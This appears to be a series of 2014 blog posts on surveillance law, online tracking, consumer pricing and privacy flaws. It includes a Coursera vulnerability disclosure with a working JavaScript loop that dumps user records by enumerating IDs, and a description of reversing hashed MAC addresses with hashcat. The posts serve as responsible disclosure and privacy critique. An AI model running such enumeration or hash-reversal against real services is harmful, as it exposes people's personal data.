15. The NSA’s authority diagram, as well as a training document, suggest that the Classified Annex Authority only applies to foreigners inside the United States. It’s unclear what the textual basis for that restriction would be, though, in NSA/CSS Policy 1-23 itself. Perhaps, as a matter of discretion, the Department of Justice chooses to not invoke CAA for U.S. persons. That discretion could change, of course.

A separate provision of NSA/CSS Policy 1-23, section 4.A.I.(d)(3), suggests that compliance with FISA is always mandatory. I think the best reading of that provision, placed in context, is that it deals with the emergency scenario of targeted foreigners who enter the United States. Under those circumstances, prompt FISA compliance is usually required.

16. This intelligence community view that Article II can trump FISA is consistent with declassified Department of Justice Office of Legal Counsel memos on the subject. Given that the NSA’s basic training materials describe the Classified Annex Authority, it seems safe to assume that CAA has been used on occasion.

17. These provisions do not protect an American against “incidental” collection, where they are a party to a communication but another party is targeted outside FISA. The scope of incidental collection can be massive; it can, for instance, involve popular foreign websites.

As interpreted by the executive branch, these provisions also do not appear to protect an American against bulk extraterritorial interceptions. Those programs, such as bulk one-end foreign Internet interception in the United Kingdom, appear to involve a two-step process. Interceptions are, initially, conducted under Executive Order 12333. (That is, there is no FISA procedure or reporting.) Then, if an NSA analyst wishes to explicitly single out an American’s data, a FISA court order is usually required.

18. The “electronic surveillance” definition, in 50 U.S.C. § 1801(f)(1), does not expressly encompass interceptions outside the United States. Ordinarily, statutory provisions are presumed to not have extraterritorial effect. What more, that provision is scoped to areas where “a warrant would be required for law enforcement purposes.” Under modern doctrine, that probably doesn’t cover international interceptions. Nevertheless, the executive branch appears to consistently read the provision to apply to interceptions outside the United States. Public statements and NSA training documents both reflect that view.

I think that’s the right reading of FISA, for four reasons. First, it’s confirmed by FISA’s legislative history. Senate reports 95-604 and 95-701, for instance, expressly note that the original protection for domestic Americans was intended to apply to extraterritorial interceptions. Second, the part of the “electronic surveillance” definition that addresses wire communications specifies that it only covers domestic interceptions. The implication is that other parts of the definition do cover extraterritorial interceptions. If that weren’t the case, the wire communications caveat would be surplusage. Third, the presumption of extraterritoriality is still somewhat vindicated. This particular provision only protects U.S. persons inside the United States. Fourth, the doctrine around extraterritorial warrants is more modern than FISA, so Congress could not have been considering that limitation at the time.

19. The source of this protection is the “electronic surveillance” definition. That’s because the part of the definition covering purely domestic wireless interception, 18 U.S.C. § 1801(f)(3), is not limited to domestic interceptions. The textual reasoning is the same as for extraterritorial interceptions targeting domestic U.S. persons, and it’s also confirmed by legislative history.

Continuing the Phone Metadata Program Without Congress: Three Options

jonathan — Wed, 26 Nov 2014 19:01:27 +0000

In the debates surrounding intelligence reform, many observers have made a critical assumption. If Congress doesn’t act by mid-2015, it goes, the NSA’s controversial phone metadata program will turn into a pumpkin. In this post, I’m going to sketch why that view is so common—and why, regrettably, the clock may not strike midnight.

Why Would the Program Expire in 2015?

In 2006, the Foreign Intelligence Surveillance Court (FISC) first authorized the NSA’s domestic bulk phone metadata program. Since that initial court order, the statutory basis for the program has been the Foreign Intelligence Surveillance Act (FISA) business record authority. It’s more commonly known as Section 215 of the USA PATRIOT Act.

Here’s the catch: the business record authority has a shelf life. Congress has to affirmatively renew it from time to time. The latest expiration date is June 1, 2015.

So, the basic reasoning is understandable.

Premise 1: The phone metadata program is based on Section 215 authority.

Premise 2: If Congress doesn’t act by mid-2015, that authority will sunset.

Assumption: If the Section 215 authority goes poof, it takes the phone metadata program with it.

Conclusion: Without a prompt legislative deal, lights out for the phone metadata program.

Unfortunately, that reasoning isn’t airtight. The executive branch has at least three non-frivolous legal theories for keeping the program alive.

The Section 215 Option: An Ongoing “Investigation”

The Section 215 sunset has a key exception. It reads that the provision will expire, “except… with respect to any particular foreign intelligence investigation that began before June 1, 2015.” Some observers have suggested that the NSA’s phone metadata program should qualify. (Including in the New York Times.)

I’m skeptical. And, based on chats with several surveillance law gurus, that’s a common perception. If the exception language were about an investigation, it’d be a reach. But the language calls for a particular investigation.¹

The FISC has bought some exceedingly strained legal reasoning before, so I wouldn’t rule this option out. It’s undoubtedly a legal long shot, though.

The Section 214 Option: Shifting to Pen/Trap Authority

The FISC approved its first bulk surveillance program in 2004. That program didn’t cover phone metadata, and it didn’t rely on FISA business record authority. Rather, the program covered email metadata,² and it relied on FISA pen register / trap and trace device authority. (These days, a pen/trap is a legal term of art for prospective collection of communications metadata.)

While the email program is now defunct, the underlying legal theories are not. Section 214 of the USA PATRIOT Act established the expanded pen/trap authority that the FISC relied on. And, when Congress renewed the USA PATRIOT Act in 2006, it made Section 214 permanent.

That means the executive branch has a ready legal fallback. If Section 215 expires without congressional intervention, the NSA can renew its phone program under Section 214.

Before an ordinary court, the Section 214 option would also be a long shot. The NSA’s phone metadata program sure looks nothing like an ordinary pen/trap.

Before the FISC, though, the Section 214 option is likely a slam dunk. From 2004 to 2011, the FISC consistently approved a nearly identical metadata program under Section 214. In order to reject the Section 214 option, the FISC would have to depart from its prior views. That’s not likely.

The Article II Option: Reasserting Inherent Presidential Power

When the NSA began its domestic email and phone metadata programs, it operated both under the President’s inherent Article II power. A subsequent review by the Department of Justice Office of Legal Counsel concluded that the email program was unlawful without FISC approval. It did not, however, conclude that the phone program was unlawful.³

The Obama administration could, conceivably, resume the Bush administration position. When Section 215 expires, the Department of Justice could start serving Article II demands on telecom services. As a political matter, that would be a terrible idea—the White House is already combating perceptions of an “imperial” presidency. The telecoms would likely also disapprove, since they wouldn’t qualify for civil immunity. All of that said—as a purely legal matter, the position would be consistent.

Comparing the Options

It’s easy to see why the executive branch would prefer a Section 215 ongoing “investigation.” That approach would preserve any other programs that operate under Section 215, including the CIA’s bulk financial records program. It could even leave the door open to future programs, like bulk collection of cellphone location. Those other programs might not comfortably fit into Section 214 or Article II.⁴

What’s more, Section 215 provides no statutory protection to criminal defendants. Section 214, by contrast, can require notice of how evidence was obtained. And it provides a suppression remedy—a key vehicle for challenging the program’s legality.

Another perk of Section 215 is that it wouldn’t require any technical changes. In the current program, carriers forward call records to the NSA. A couple of colleagues have suggested that under a Section 214 version, the NSA might have to collect the call records itself. I don’t think that’s right—pen/trap orders to online services routinely require forwarding copies of metadata. At any rate, even if a technical change were needed, the NSA has more than sufficient capability to accomplish that collection itself.⁵

So, if I were an intelligence community lawyer tasked with extending the phone metadata program, here’s what I’d be thinking. First, pitch the FISC on the Section 215 ongoing “investigation” theory. If that works, great. It probably won’t. Then, use Section 214 as a backstop.

Closing Thoughts

Let me be clear: I think the domestic bulk phone metadata program should end. It hasn’t produced unique intelligence value, and it has enormous privacy implications. The President’s Review Group and the Privacy and Civil Liberties Oversight Board both reached the same conclusion. Even the White House and the NSA now support structural reform.

That reform debate will continue to play out in Congress. And in the debate, critics of the NSA thought they had crucial leverage—a June 2015 make-or-break deadline for a major agency program.

There is, to be sure, still substantial leverage. The intelligence community values FISA business record authority—it allows access to communications metadata that’s beyond the reach of a national security letter. And if the executive branch were to extend the phone metadata program without Congress, on any legal theory, it would undoubtedly catch political flak.

The key point of leverage, though, was supposed to be the phone metadata program. It’s not necessarily ending.

Thanks to the fellow wonks who kicked around the ideas in the post. All views are solely my own.

1. What’s more, a subsequent part of the exception deals with particular criminal investigations—plainly not dragnet programs. Perhaps the NSA could keep the program partially in operation, only for previously approved targets. That would be an awkward outcome, and at any rate, it could sharply curtail any future intelligence value from the program.

2. Some documents suggest Internet Protocol metadata, unrelated to email, was also collected under this program. The NSA and the FISC appear to have focused mostly on email metadata, though.

3. The relevant OLC memos are, unfortunately, still classified. A summary is available in a leaked NSA Inspector General report. My best guess is that OLC concluded the law enforcement (ECPA) pen/trap prohibition in 18 U.S.C. § 3121 is stronger than the customer records disclosure prohibition in 18 U.S.C. § 2702. But that’s really just a guess.

4. Financial records, for instance, plainly aren’t the sort of communications metadata covered by a pen/trap order. And a FISA pen/trap order may not be sufficient for obtaining phone location because of a separate provision in CALEA.

5. A related issue is that by switching to pen/trap authority, the NSA would be admitting the phone metadata program was a pen/trap all along. The ECPA pen/trap provisions generally prohibit operating a pen/trap without a pen/trap order, so you might think the NSA would be admitting past illegality. The NSA has at least two possible responses, though. First, the ECPA pen/trap prohibition makes an exception for any FISA order, not just FISA pen/trap orders. That covers business record orders. Second, if the NSA shifted to direct collection from telecoms, that should sufficiently distinguish the old version of the program as not a pen/trap.

How Verizon’s Advertising Header Works

jonathan — Fri, 24 Oct 2014 19:32:50 +0000

Over the past couple of days, there’s been an outpouring of concern about Verizon’s advertising practices. Verizon Wireless is injecting a unique identifier into web requests, as data transits the network. On my phone, for example, here’s the extra HTTP header.¹

X-UIDH: OTgxNTk2NDk0ADJVquRu5NS5+rSbBANlrp+13QL7CXLGsFHpMi4LsUHw

After poring over Verizon’s related patents and marketing materials, here’s my rough understanding of how the header works.

In short, Verizon is packaging and selling subscriber information, acting as a data broker on real-time advertising exchanges. Questionable. By default, the information appears to consist of demographic and geographic segments.² If a user has opted into “Verizon Selects,” then Verizon also shares behavioral profiles built by deep packet inspection.

Whatever the merits of Verizon’s new business model, the technical design has two substantial shortcomings. First, the X-UIDH header functions as a temporary supercookie.³ Any website can easily track a user, regardless of cookie blocking and other privacy protections.⁴ No relationship with Verizon is required.

Second, while Verizon offers privacy settings, they don’t prevent sending the X-UIDH header.⁵ All they do, seemingly, is prevent Verizon from selling information about a user.

Much better designs are possible. Verizon doesn’t need to supercookie its wireless subscribers to sell their advertising segments.⁶ And it certainly doesn’t need to send a supercookie if a user isn’t participating.

The diagram above includes phone, server, cloud, and cash assets from The Noun Project. Thanks to the participants in Princeton’s Web Tracking and Transparency Workshop, who provided valuable feedback.

1. In my (very limited) testing, the header was injected into every HTTP request from my iPhone 6 Plus. Some subscribers have reported not seeing the header, or only seeing the header with certain requests.

2. Verizon’s case studies also suggest the system can be used for advertising attribution.

3. According to a comment on Hacker News, the X-UIDH value changes each week. I can’t (yet) confirm that. Over the past two days, anyway, the X-UIDH value for my phone has been static.

4. HTTP blocking, like Adblock Plus or Privacy Badger, would still be effective.

5. If I understand correctly, the demographic and geographic advertising segments are opt out, associated with Verizon’s CPNI privacy preference. Behavioral segments are opt in, associated with the “Verizon Selects” preference (formerly “Relevant Mobile Advertising”).

6. For example, Verizon could send an encrypted ID and nonce with each request. A recipient website would not be able to use the values to track a user.

A Funny Thing Happened on the Way to Coursera

jonathan — Thu, 04 Sep 2014 16:26:23 +0000

I’m excited to be teaching Stanford Law’s first Coursera offering this fall, on government surveillance. In preparation, I’ve been extensively poking around the platform; while I found some snazzy features, I also stumbled across a few security and privacy issues.

Any teacher can dump the entire user database, including over nine million names and email addresses.
If you are logged into your Coursera account, any website that you visit can list your course enrollments.
Coursera’s privacy-protecting user IDs don’t do much privacy protecting.

The balance of this piece provides some detail on each of the vulnerabilities.

Update 9/4: Coursera has acknowledged the issues, and claims they are “fully addressed.” The second vulnerability, however, still exists.

Update 9/6: Coursera appears to have imposed rate limiting on the APIs associated with the second vulnerability, mitigating the risk to users. A malicious website can now iterate over about 10% of the course catalog before having to wait.

1. Downloading Coursera’s User Database

Several of Coursera’s teacher pages include a user autocomplete field.

Example autocomplete field, for creating a new instructor.

After typing a few characters from a user’s email address, a drop down makes suggestions. That was an immediate red flag, since autocomplete is usually based on information that a user can already access. Webmail autocomplete, for example, relies on previous messages; social network autocomplete relies on a public directory.

Autocomplete with semi-private information is inherently risky: it’s easy to inadvertently share too much. A similar vulnerability in AT&T’s iPad registration website, for example, enabled Daniel Spitler and Andrew “weev” Auernheimer to dump subscriber email addresses. (The two were subsequently prosecuted. Jennifer Granick and I coauthored an amicus brief in Auernheimer’s appeal, arguing that he hadn’t violated the federal hacking law.)

Back to Coursera. The email autocomplete, I noticed, uses a simple API endpoint. A request for

http://www.coursera.org/maestro/api/admin/search?email=jm

returns something like

[...,
    {
        "auth_type": 0,
        "display_email": "jmayer@...",
        "id": 544426,
        "full_name": "Jonathan Mayer",
        "email": "jmayer@..."
    }, ...
]

It’s also possible to query the API using Coursera’s sequential (“internal”) user IDs.

https://www.coursera.org/maestro/api/admin/search?id=544426

Since the API does not have any rate limiting in place, anyone with teacher access could trivially iterate over user IDs or email substrings and dump the entire database. As a proof of concept, I cobbled together the following JavaScript. It fetches 1,000 user names and email addresses.

var users = [];
var startID = 1;
var stopID = 1000;
for (var i = startID; i <= stopID; i++) {
    var req = new XMLHttpRequest();
    req.onload = function() {
        try {
            data = JSON.parse(req.responseText);
            if (data.length > 0) users.push(data[0]);
        } catch (e) {}
    };
    req.open("get", "https://www.coursera.org/maestro/api/admin/search?id=" + i, false);
    req.send();
}

Yes, it works.

I reported this issue to Coursera last Thursday; to the company’s credit, in less than a day API responses were reduced to 10 records (down from 200) and email queries required 5 characters (up from 2). Rate limits—the most important defense, if Coursera retains this autocomplete feature—will also be enabled soon. So, the good news is that dumping the entire student database will become much more difficult.

The bad news is that anyone with teacher access can still look up any individual student’s contact information, so long as he or she either knows the student’s internal ID (it’s embedded in many pages) or can guess a distinctive part of the student’s email address (maybe try first initial last name?). That’s a questionable security model, and it’s potentially inconsistent with Coursera’s privacy policy.¹

2. Listing a Student’s Course Enrollments

Educational choices can be very revealing. A quick skim of Coursera’s catalog, for instance, turns up offerings related to medical conditions and religious beliefs. The notion that course enrollments should be (optionally) private is certainly not new—for over forty years, federal law has limited when academic institutions can share student records.²

While fiddling with Coursera’s APIs, I spotted a cross-origin information leak that could be used to list a student’s course enrollments. The idea is that certain endpoints respond to user permission problems with an HTTP error status. Another website could trivially trigger a request to those endpoints and check the response status.

Consider the user ID endpoint at

https://api.coursera.org/utilities/v1/whoami

If a user is not logged in, the response reads like

{"message":"unauthorized"}

with a 401 Unauthorized status. By contrast, if the user is logged in, the response is like

{"userId":"544426","partnerId":"None","isCoursera":"true"}

with a 200 OK status. It’s easy for another website to determine whether a user is logged in, like so

The very same approach works for listing a student’s courses. The endpoint at

https://api.coursera.org/api/sessions/v1/COURSE_ID/sections/1/items

returns materials for the first section of a course. If a student is enrolled, 200 OK; if not, 401 Unauthorized.

Developing a proof-of-concept was straightforward. If you’d like to see the issue in action, log into your Coursera account and visit this test page. With near-zero effort at optimization, the page gathers your course enrollments in under a minute.

I reported the issue to Coursera on Sunday, and I have not yet received a response. Possible remediation steps include rate limiting (again), referrer checking, and configuring APIs to always return the same HTTP status.

3. Undoing User ID Privacy Protection

Every user in Coursera’s system has two separate identifiers: a sequential “internal” ID, and a gibberish-looking “external” ID. My internal ID, for example, is 544426 and my external ID is fe7e73fef0333f550378979caa1d3347.

The reason for maintaining two identifiers is, supposedly, account security and privacy. A public resource, such as a user profile page, references just the external ID.

https://www.coursera.org/user/i/fe7e73fef0333f550378979caa1d3347

It is difficult to discern what, exactly, the dual ID scheme is supposed to accomplish. So long as a user’s profile is accessible, one API endpoint at

https://www.coursera.org/maestro/api/user/profiles

maps the internal ID to the external ID.

[{
    ...
    "external_id": "fe7e73fef0333f550378979caa1d3347"
}]

Another API endpoint, at

https://www.coursera.org/maestro/api/user/profile

maps the external ID to the internal ID.

{
    ...
    "id": 544426,
    ...
}

It’s trivial to undo any (mysterious) security or privacy gain so long as these APIs are available. It’s also trivial to build a dictionary of internal and external IDs.

What’s more, most external IDs aren’t actually gibberish. They appear to fall into three sets:

For users with internal IDs roughly between 0 and 1.15M, the external ID is simply an MD5 hash of some (relatively) small number. My external ID, for example, is the hash of 315368.
For users with internal IDs roughly between 1.15M and 7M, the external ID is merely an MD5 hash of the internal ID.
For users with internal IDs of 7M or above, the external ID is not super-obviously reversible.

The punchline is that, for the majority of Coursera users, no API is even needed to flip between external and internal IDs. If you’re curious about your own external ID, you can grab it from your Coursera profile URL and pop it into a free MD5 reversal website.

I notified Coursera of this issue last Thursday. Apparently external IDs for new users haven’t been generated with MD5 for about a year. That prospectively solves one aspect of the problem—but it doesn’t address older (i.e. most) users or the mapping APIs.

Most importantly, it doesn’t explain what these external IDs are supposed to achieve. Even if there were no simple APIs for mapping IDs, and even if external IDs weren’t easily reversible (e.g. a salted hash or HMAC), what is the precise security or privacy benefit?

1. Coursera’s privacy policy lists circumstances in which a student’s contact information might be shared with an academic institution, including when a student has enrolled in one of the institution’s courses and for marketing purposes. Those caveats would not seem to cover making every student’s information available to every teacher.

2. Coursera and partner institutions have taken the position that offerings on the platform are not covered by the Family Educational Rights and Privacy Act (FERPA). Online courses do not have “students,” they have “participants.”

Mobile Phone Unlocking, Now Less Illegal?

jonathan — Mon, 04 Aug 2014 18:15:00 +0000

On Friday, President Obama signed a mobile phone unlocking bill into law. Some observers have taken to describing S. 517, the Unlocking Consumer Choice and Wireless Competition Act, as a permission slip for consumers. Here’s a sample:

The New York Times: “you will no longer be breaking the law if you unlock your cellphone”
The Los Angeles Times: “makes it legal once again for consumers to unlock their cellphones”
CNET: “makes unlocking a cell phone legal again”

Those explanations aren’t quite accurate. The new law (temporarily) shields consumers from the Digital Millennium Copyright Act. It is, by design, a narrow fix; it expressly leaves other sources of legal liability untouched.

“. . . nothing in this Act shall be construed to alter the scope of any party’s rights under existing law.”

Contract law certainly still applies. If you have agreed with your carrier that you will not unlock your phone, that promise remains legally binding and enforceable. Here’s what the AT&T service contract says, for example:

You agree that you won’t make any modifications to your Equipment or its programming to enable the Equipment to operate on any other system.

Computer abuse law is another potential source of liability. Wireless services have previously targeted mobile phone resellers with federal and state anti-hacking statutes. In 2012 alone, cell carriers filed over a dozen Computer Fraud and Abuse Act unlocking lawsuits.

So, what exactly has changed? Last week’s law is unambiguously a big political win for consumers. The winds have plainly shifted towards greater control over personal devices.

Last week’s law is, however, only a partial legal win for consumers. There remain civil and criminal legal risks associated with unauthorized cell phone unlocking.

Disclaimer: I am not your lawyer, and this is not legal advice.

Is Instacart Deceptive?

jonathan — Tue, 08 Jul 2014 19:01:54 +0000

A few weeks ago, a Stanford colleague stormed into my office. He had ordered some groceries from Instacart, a buzzy get-it-now startup that recently raised $44 million. My friend thought he had paid a flat $3.99 for delivery from a local store. In fact, he had paid about $20 net of store prices. How, he fumed, could this be legal? From a quick Googling, he isn’t the only one steamed about Instacart’s subtle surcharge.

Measuring the Markup
In an attempt to estimate the Instacart commission, I picked four stores: Safeway and Costco in San Francisco, and The Food Emporium and Costco in New York City. I built a basket of goods for each store, using what was “Popular” on Instacart. Finally, I compared Instacart’s prices with store prices.¹ All of my data is available on a spreadsheet. The following histograms reflect relative price differences.²

A few results are apparent. First, Instacart unambiguously charges a premium. As a rule of thumb, the markup is 20%. This finding is roughly consistent with previous informal estimates. Here’s an example, to illustrate the effect: an order that appears to be $50 of groceries with a $3.99 flat delivery fee is, in fact, about $41.67 of groceries and $12.32 in delivery expense. Yikes.

Second, Instacart’s premium is not specific to a geographic market. Both San Francisco and New York City exhibit increased pricing. The legal implication is that Instacart’s business model must pass muster with multiple states’ consumer protection laws.

Third, the distribution of the markup varies from store to store. I could only speculate as to why.³

Fourth, there are substantial outliers in both directions. Instacart did have a few steals, such as nearly-half-off avocados at Safeway and The Food Emporium. It also had some astonishingly awful deals, though, such as 86% inflated Simply Orange juice at Safeway and 70% marked up cans of Coke at The Food Emporium.

I also noticed that Instacart’s “Extraordinary Value” notation has questionable meaning. For example, Instacart featured a bottle of Domain Chandon Brut for $16.09 from Safeway. The very same sparkling wine was 10¢ less at Safeway and competing local stores. Not much extraordinary about that value.

So, is all this legal? Consumer protection law involves a fact-intensive inquiry into how ordinary consumers perceive a business, and whether they would be misled.⁴

In Defense of Instacart
There are a couple good facts for Instacart. The service does have a disclosure.⁵

Are your prices different from the store?
Yes, Instacart prices are our own and vary from the store’s price…

The legal effect of this passage is debatable, though. A shopper would have to navigate to the FAQ and scroll down to find it. Furthermore, the text notes only that Instacart’s prices are different—not that they are higher, and not how much higher.

Instacart also benefits from some news coverage and online discussion, which have explained that the service relies on a markup. For those paying particularly close attention, the contours of the business model are plainly not a secret.

The Case Against Instacart
There are, on the other hand, a number of bad facts. The worst, perhaps, are Instacart’s own pricing explanations. Representatives have variously claimed that the markup is “nominal,” just a “touch” higher than in-store pricing, “slightly different than what is in stores,” and “a little different than what you would see at the grocery store.” Good luck squaring that with a 20% commission.

What’s more, some of Instacart’s descriptions create a predictable false equivalence, such as “prices are a bit higher or a bit lower” and “our prices are lower or higher than the stores’ prices, sometimes they are the same.” Yes, all these price relationships are possible, but they hardly occur with equal probability. An earlier version of the Instacart FAQ included similar language but, tellingly, the text was removed.

Assuming it is authentic, a 2013 pitch deck that I stumbled across is also problematic.

When explaining its business model to investors, Instacart puts the markup front and center. When dealing with shoppers, Instacart buries the lede. Differential messaging sure looks bad under consumer protection law, and the deck suggests more might come out in discovery.

Instacart’s pricing structure may also contribute to consumer confusion. The service promotes “free” delivery for new customers and flat delivery fees for repeat shoppers. When explaining “delivery cost,” the FAQ nowhere suggests that product prices are a factor. A customer could trivially assume that listed fees are the sole or primary source of delivery expense.

The Instacart experience is another knock, since it is designed to mimic shopping at your local store. A user begins by selecting a grocer, then navigates by department. After placing an order, contractors actually go to the store and make the purchase. It is easy to see how a shopper might erroneously assume that Instacart charges roughly in-store prices.

Instacart’s alcohol pricing FAQ highlights the firm’s tenuous position.

Are your alcohol prices different from the store?
No, but we add a delivery fee to the store’s price for each item you purchase. This is why the prices listed on our website appear to be higher than those charged in the store.

Apparently a surcharge on booze is a “delivery fee,” while a markup on everything else is a “vary[ing]” price. The purpose of this passage is, presumably, to sidestep alcohol sales law. In the process, though, it emphasizes how an inflated price is functionally equivalent to a delivery fee.

Instacart’s peers pose a final problem. Much of the latest crop of same-day delivery services rely on transparent fees, including Postmates, TaskRabbit, Google Shopping Express, and eBay Now.⁶ These offerings function like flat-rate courier services, not a corner convenience store. Since Instacart’s competitors don’t include a markup, consumers might not expect it.

Concluding Thoughts
Instacart operates in a gray area. The business model is certainly close to the legal line; which side it falls on, I can’t say.⁷ I informally polled a group of lawyer friends for their views, and all agreed that Instacart had substantial exposure to law enforcement and private litigation risks. (I wonder if investors were aware.)

Setting aside the law, Instacart’s business model is quite unsavory. Instacart is plainly designed with the intent and effect of hiding the true cost of grocery delivery. Uncool.

The possible fixes are obvious and easy: Wherever the service discusses its delivery fees, for example, it could also note its approximate markup. Alternatively, it could note the expected premium next to prices, in the shopping cart, or on the checkout page.

I am all in favor of “disrupting” the grocery store. Just not by misleading shoppers.

Usual disclaimer: I am a lawyer, but this is not legal advice.

1. This methodology may introduce a slight bias in Instacart’s favor, since shoppers who recognize the surcharge may select better values.

Prices for Safeway and The Food Emporium are taken directly from those stores’ websites. The pricing includes available discounts. (In my experience, it’s not even necessary to have a card at these stores—politely asking a cashier is sufficient.) Prices for Costco are from Google Shopping Express, which appears to reflect in-store pricing. (Costco has an online business delivery service, but it seems to have different prices.)

I assume that Instacart separately charges applicable taxes, since that has been my experience using the site. To the extent Instacart’s prices include taxes, the surcharges reported here should be discounted that much. They would still be substantial.

2. I also generated the following histograms of absolute price differences.

These distributions are generally less concentrated than the distributions for relative price differential, so I focus the discussion there.

3. I imagine factors include Safeway’s notoriously fickle discounting, the frequency with which specific items are ordered from specific stores, and amortization of the Costco membership fee.

4. For simplicity, I lump together the usual consumer protection causes of action (including unfair business practices, deceptive business practices, false advertising, and common law fraud). The specifics of these claims differ, to be sure, and vary by jurisdiction. For purposes of Instacart, though, the causes largely reduce to the same factual issue.

5. The Instacart “Terms and Conditions” also include this passage.

The additional fee Customer pays that is above the retail price of the Groceries is for the purpose of engaging the Personal Shopper to perform the Personal Shopper Services.

Read in context, this passage is an explanation of the customer’s business relationship with Instacart and its independent contractors. The provision explains why fees are charged, not how fees are charged. A flat delivery fee would also be within the meaning of this text—and has to be, since the document nowhere else addresses payment for grocery delivery.

6. At least one other get-it-now startup, DoorDash, uses inflated prices. The specifics of the business model differ (restaurants choose whether and how much to increase prices, not the delivery service), and there is clearer disclosure in the website’s FAQ.

7. The closest analogy that comes to mind—and it’s hardly a perfect fit—is litigation over inflated currency exchange rates. Courts have squarely split on the issue.

Questionable Crypto in Retail Analytics

jonathan — Wed, 19 Mar 2014 13:39:22 +0000

Retail analytics is a fraught field. The premise is straightforward: enable brick-and-mortar stores to track their customers. The technology is straightforward, too: monitor broadcasts from shoppers’ smartphones. Privacy concerns have, however, put a damper on the nascent industry. Regulators, legislators, and advocacy groups have questioned the legitimacy of surreptitiously monitoring shoppers’ gadgets.

Last fall, Senator Schumer announced a grand bargain with retail analytics firms. They will be bound by a “Mobile Location Analytics Code of Conduct,” a set of voluntary practices intended to assuage privacy fears. The document has already been widely panned, both as a product of backroom dealing, and for providing little substantive protection to consumers.

One particular point of contention is how the industry proposes to preserve privacy through cryptography. This post explains the Code of Conduct’s crypto, and demonstrates how it can trivially be undone.

A brief explanation of retail analytics sets the stage. Your smartphone includes WiFi and Bluetooth chips, and those chips each have a unique serial number, called a MAC address. Periodically your phone will announce itself, including those MAC addresses. The most common approach to retail analytics simply logs these broadcasts and compiles a shopper’s activity. A retail analytics firm might, for example, build a database like this.

MAC Address	Locations
aa:bb:cc:dd:ee:ff	Gap, Chicago, Tuesday at 10am Apple Store, San Francisco, Thursday at 1pm AT&T Park, San Francisco, Thursday at 8pm
11:22:33:44:55:66	Nordstrom, New York, Sunday at 7pm

As a concession to privacy concerns, the Code of Conduct calls for a math fix. Before a MAC address is saved, it gets passed through a cryptographic hash function. The idea, without going into detail, is to produce a random-looking number from each MAC address. The result is a database like this.¹

Hashed MAC Address	Locations
317060aa70a5a9e846…	Gap, Chicago, Tuesday at 10am Apple Store, San Francisco, Thursday at 1pm AT&T Park, San Francisco, Thursday at 8pm
5c6a981c81b9fcb030…	Nordstrom, New York, Sunday at 7pm

It’s far from clear that hashing actually solves privacy problems here. If someone wants to learn the shopping history associated with a particular MAC address, they can simply apply the hash function, then look up the hash in the database.
$ echo -n "aa:bb:cc:dd:ee:ff" | openssl sha1 317060aa70a5a9e846...

Hashing is also no defense against re-identification. For example, if you know Alice went to Gap in Chicago on Tuesday morning, and the Apple Store in San Francisco on Thursday afternoon, it’s trivial to identify Alice’s smartphone in the database.

Hashed MAC Address	Locations
317060aa70a5a9e846…	Gap, Chicago, Tuesday at 10am Apple Store, San Francisco, Thursday at 1pm AT&T Park, San Francisco, Thursday at 8pm

There’s yet another problem here. The very purpose of this crypto is to prevent reversing a hash back into an unknown MAC address. Euclid, one of the better-known retail analytics firms, claims:

Hashed data cannot be reverse-engineered by a third party to reveal a device’s MAC address. This means that anyone who gains access to the database . . . would see only long strings of numbers and letters. They would be unable to get any information that could be linked to a back to a particular mobile device owner.

Challenge accepted. In under an hour, and for less than a dollar, I built a cloud system that reverses hashed MAC addresses.²

Some back of the envelope math suggested the task was doable. There are 6 bytes in a MAC address; the first 3 bytes are allocated to the network device vendor, and the last 3 bytes are chosen by the vendor. In total, then, there are 2⁴⁸ possible MAC addresses. Since only 19,130 vendor prefixes have been actually allocated for use, however, there are at most 2^38.22 validly assigned MAC addresses. That number might sound big, but modern consumer hardware can calculate roughly 2³⁰ hashes per second. In other words, it should be possible to check every validly assigned MAC address in just a few minutes.

Since I had just a puny notebook on hand, I rented a server with a graphics card in Amazon’s cloud. (Hashing involves parallelized math, so a graphics card gives a substantial performance boost.) Next, I installed oclHashcat, a fast hash-checking program. Writing format files for hashcat took just a few minutes.³ (They’re available on GitHub for the curious.) Then, with no effort at optimization, I tossed in the hash of my smartphone’s MAC address. Reversing the hash took just 12 minutes. Total cost: $0.65, plus tax.

There’s plenty of room for improvement. A more sophisticated approach would be to prioritize MAC prefixes associated with smartphone vendors. It’s also trivial to compute hashes for all the valid MAC addresses and save them for quick lookup; a few consumer hard drives would provide sufficient storage.⁴

Before closing, let me add a quick note about salted hashing and hash-based message authentication codes (HMAC). Those techniques integrate extra information in the course of hashing, frustrating attacks that rely on precomputed hash values. They do not, however, protect against attacks that involve actually computing hashes. If an employee or intruder has access to hashed MAC addresses, they presumptively also have access to the extra information. Salting and HMAC are no solution here.

The problem underlying all this is a flawed assumption within the Code of Conduct. In cringe-inducing legalese, that document presumes retail analytics data can be simultaneously:

“associated with a particular . . . device,” and
not “reasonably . . . linked to an individual,” including their MAC address.

There is no such class of data, so long as retail analytics free rides on smartphone WiFi and Bluetooth.⁵ Hashing is not a silver bullet for electronic privacy. As we have seen, it is possible to test retail analytics data against every possible device. If data is associated with a particular device, it is always linkable back to an individual.

1. Throughout this post, I use the SHA-1 cryptographic hash function. My understanding is that several retail analytics firms have deployed it in their products. The same analysis would apply for a different hash function, just with different output values, performance, and memory requirements.

2. After drafting this post, I came across a master’s degree research paper at INRIA on WiFi tracking and privacy. The author also concludes that reversing hashed MAC addresses is easy, and “hashing a MAC address is not a satisfactory solution” for location privacy.

3. I formatted MAC addresses in lowercase, without byte separators. It would be trivial to use a different format, or even multiple formats.

4. A naïve approach would be to store each valid MAC address and its SHA1 hash in a database. Since each MAC address is 6 bytes, and each SHA1 hash is 20 bytes, the pair is 26 bytes. There are 2^38.22 valid MAC addresses, as discussed above. The entire set is therefore 26 · 2^38.22 bytes ≈ 8.5 TB.

5. If shoppers ran store software on their smartphones, there would be viable privacy-preserving approaches to retail analytics. The appeal of WiFi and Bluetooth, of course, is that shoppers are automatically included.

MetaPhone: The Sensitivity of Telephone Metadata

jonathan — Wed, 12 Mar 2014 14:45:04 +0000

Co-authored by Patrick Mutchler.

Is telephone metadata sensitive? The debate has taken on new urgency since last summer’s NSA revelations; all three branches of the federal government are now considering curbs on access. Consumer privacy concerns are also salient, as the FCC assesses telecom data sharing practices.

President Obama has emphasized that the NSA is “not looking at content.” “[T]his is just metadata,” Senator Feinstein told reporters. In dismissing the ACLU’s legal challenge, Judge Pauley shrugged off possible sensitive inferences as a “parade of horribles.”

